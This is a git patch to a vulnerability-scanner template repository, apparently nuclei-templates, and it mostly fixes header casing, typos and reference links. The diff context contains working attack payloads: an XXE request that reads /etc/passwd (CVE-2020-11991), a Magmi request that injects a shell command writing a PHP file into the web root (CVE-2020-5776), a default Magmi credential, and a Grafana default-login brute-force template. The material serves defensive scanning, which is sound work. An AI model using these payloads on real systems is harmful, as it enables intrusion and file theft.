From 2a320412bf333126653a8c997eb72dfa2c87df67 Mon Sep 17 00:00:00 2001
From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com>
Date: Thu, 19 Aug 2021 17:25:01 +0300
Subject: [PATCH] Misc (minor)

Related nuclei tickets:
* #259 - dynamic key-value field support for template information
* #940 - new infos in template
* #834
* RES-84
---
 CONTRIBUTING.md                                        | 2 +-
 cves/2017/CVE-2017-7391.yaml                           | 5 +++--
 cves/2020/CVE-2020-11991.yaml                          | 2 +-
 cves/2020/CVE-2020-25223.yaml                          | 2 +-
 cves/2020/CVE-2020-5776.yaml                           | 4 ++--
 cves/2020/CVE-2020-5777.yaml                           | 2 +-
 default-logins/grafana/grafana-default-credential.yaml | 3 +--
 technologies/magento-detect.yaml                       | 5 +++--
 8 files changed, 13 insertions(+), 12 deletions(-)

diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index 61084b76db..64b9408cf0 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -53,7 +53,7 @@ git checkout -b template_branch_name
 git add .
 ```
 
-- To commit give a descriptive message for the convenience of reveiwer by:
+- To commit, give a descriptive message for the convenience of the reviewer by:
 
 ```sh
 # This message get associated with all files you have changed
diff --git a/cves/2017/CVE-2017-7391.yaml b/cves/2017/CVE-2017-7391.yaml
index fab72d8d74..a3ebfb4f8d 100644
--- a/cves/2017/CVE-2017-7391.yaml
+++ b/cves/2017/CVE-2017-7391.yaml
@@ -6,8 +6,9 @@ info:
   severity: medium
   description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
   tags: cve,cve2017,magmi,xss
-  reference: https://github.com/dweeves/magmi-git/issues/522
-  # Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
+  reference:
+    - https://github.com/dweeves/magmi-git/issues/522
+    - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml
index 18f07c95ee..043b9aeaa0 100644
--- a/cves/2020/CVE-2020-11991.yaml
+++ b/cves/2020/CVE-2020-11991.yaml
@@ -14,7 +14,7 @@ requests:
     path:
       - "{{BaseURL}}/v2/api/product/manger/getInfo"
     headers:
-      Content-type: "text/xml"
+      Content-Type: "text/xml"
     body: |
       <!--?xml version="1.0" ?-->
       <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml
index 9688a0fa4b..21cf8027b4 100644
--- a/cves/2020/CVE-2020-25223.yaml
+++ b/cves/2020/CVE-2020-25223.yaml
@@ -19,7 +19,7 @@ requests:
         Accept-Encoding: gzip, deflate
         X-Requested-With: XMLHttpRequest
         X-Prototype-Version: 1.5.1.1
-        Content-type: application/json; charset=UTF-8
+        Content-Type: application/json; charset=UTF-8
         Origin: {{BaseURL}}
         Connection: close
         Referer: {{BaseURL}}
diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml
index af8c29283c..513a3be8c5 100644
--- a/cves/2020/CVE-2020-5776.yaml
+++ b/cves/2020/CVE-2020-5776.yaml
@@ -17,14 +17,14 @@ requests:
       - |
         POST /magmi/web/magmi_saveprofile.php HTTP/1.1
         Host: {{Hostname}}
-        Content-type: application/x-www-form-urlencoded
+        Content-Type: application/x-www-form-urlencoded
         Connection: close
 
         profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
       - |
         POST /magmi/web/magmi_run.php HTTP/1.1
         Host: {{Hostname}}
-        Content-type: application/x-www-form-urlencoded
+        Content-Type: application/x-www-form-urlencoded
         Connection: close
 
         engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update
diff --git a/cves/2020/CVE-2020-5777.yaml b/cves/2020/CVE-2020-5777.yaml
index 830da22728..6dbfb02778 100644
--- a/cves/2020/CVE-2020-5777.yaml
+++ b/cves/2020/CVE-2020-5777.yaml
@@ -10,7 +10,7 @@ info:
 
   # Response code 503 indicates a potential successful "Too many connections" error
   # While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
-  # whith default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
+  # with default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
   # Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100
 
 requests:
diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml
index 7f783dfd10..377385c534 100644
--- a/default-logins/grafana/grafana-default-credential.yaml
+++ b/default-logins/grafana/grafana-default-credential.yaml
@@ -23,8 +23,7 @@ requests:
         - prom-operator
         - admin
 
-    # Added default grafana and prometheus user.
-    # Source: https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
+    # Added default grafana and prometheus user. reference[2]
 
     attack: sniper
 
diff --git a/technologies/magento-detect.yaml b/technologies/magento-detect.yaml
index ee57eac989..de461a9837 100644
--- a/technologies/magento-detect.yaml
+++ b/technologies/magento-detect.yaml
@@ -5,6 +5,8 @@ info:
   author: TechbrunchFR
   severity: info
   description: Identify Magento
+  reference:
+    - https://devdocs.magento.com/guides/v2.4/graphql/
   tags: magento
 
 requests:
@@ -14,8 +16,7 @@ requests:
       - '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}'
 
       # There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when
-      # consumed by a SPA/PWA app so we need a valid GraphQL query from Magento to check
-      # https://devdocs.magento.com/guides/v2.4/graphql/
+      # consumed by a SPA/PWA app, so we need a valid GraphQL query from Magento to check reference[1]
 
     matchers-condition: or
     matchers: